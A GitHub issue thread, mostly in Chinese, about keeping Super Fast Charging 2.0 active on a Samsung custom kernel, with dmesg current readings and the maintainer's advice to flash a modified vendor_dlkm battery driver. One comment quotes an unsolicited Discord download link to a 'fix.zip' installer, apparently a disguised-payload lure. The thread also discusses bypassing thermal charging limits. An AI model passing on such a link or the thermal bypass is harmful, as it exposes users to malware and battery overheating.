### ISSUE TITLE
有没有办法锁定一下超级快充2.0

### ISSUE THREAD

**Issue by kalicyh** [qlenlen/android_kernel_samsung_sm8550#11]
充电器是原装的，支持超级快充2.0
但是冲一会就会降低，也屏蔽温控了
![image](https://github.com/user-attachments/assets/026841fa-35e0-422c-81da-4f698a4e5883)

**Comment by qlenlen** [comment]
目前只有刷写vendor_dlkm（第一版、第二版）可以稳定快充，后续的集成内核（kprobes）只能修改common电池温度，无法修改充电器读取的温度（未导出symbol）

**Comment by kalicyh** [comment]
我刚刚导出了dmesg
[log.txt](https://github.com/user-attachments/files/16849656/log.txt)

**Comment by kalicyh** [comment]
> try this https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538& select the desired compiler in the installer

I am using macOS and cannot test this.

**Comment by kalicyh** [comment]
> 我刚刚导出了dmesg [log.txt](https://github.com/user-attachments/files/16849656/log.txt)

在13719行

```sh
[25123.141495] max77705_fg_read_current: current=7182mA
```

到13966行降低到3a电流
```sh
[25123.363819] max77705_fg_read_current: current=3120mA
```

15393行左右拔掉充电器
```sh
[25141.951730] max77705_fg_read_current: current=-530mA
```

**Comment by kalicyh** [comment]
> 目前只有刷写vendor_dlkm（第一版、第二版）可以稳定快充，后续的集成内核（kprobes）只能修改common电池温度，无法修改充电器读取的温度（未导出symbol）

那是否有内核/模块方式的实现呢？

**Comment by qlenlen** [comment]
使用fastboot刷写逻辑分区vendor_dlkm，替换官方电池驱动。这是目前唯一的稳定的方法。
另外的两条路是对内核做degki集成电池驱动（未完全成功）；还有就是编辑dtb设备树（还未尝试）

**Comment by kalicyh** [comment]
> 使用fastboot刷写逻辑分区vendor_dlkm，替换官方电池驱动。这是目前唯一的稳定的方法。 另外的两条路是对内核做degki集成电池驱动（未完全成功）；还有就是编辑dtb设备树（还未尝试）

那可以是最新的内核上刷写vendor_dlkm吗？
这个是加了散热背夹的效果
![image](https://github.com/user-attachments/assets/0620e1ac-5cc1-432d-98c0-fca4c90056fa)

**Comment by qlenlen** [comment]
> > 使用fastboot刷写逻辑分区vendor_dlkm，替换官方电池驱动。这是目前唯一的稳定的方法。 另外的两条路是对内核做degki集成电池驱动（未完全成功）；还有就是编辑dtb设备树（还未尝试）
> 
> 那可以是最新的内核上刷写vendor_dlkm吗？
> 这个是加了散热背夹的效果
> ![image](https://github.com/user-attachments/assets/0620e1ac-5cc1-432d-98c0-fca4c90056fa)
> 

是的 最新内核可以刷写dlkm，只建议使用fastboot刷写。并且确保自己处于oneui6.1 xcf以后的版本，国港版本通用，其他外版不建议尝试
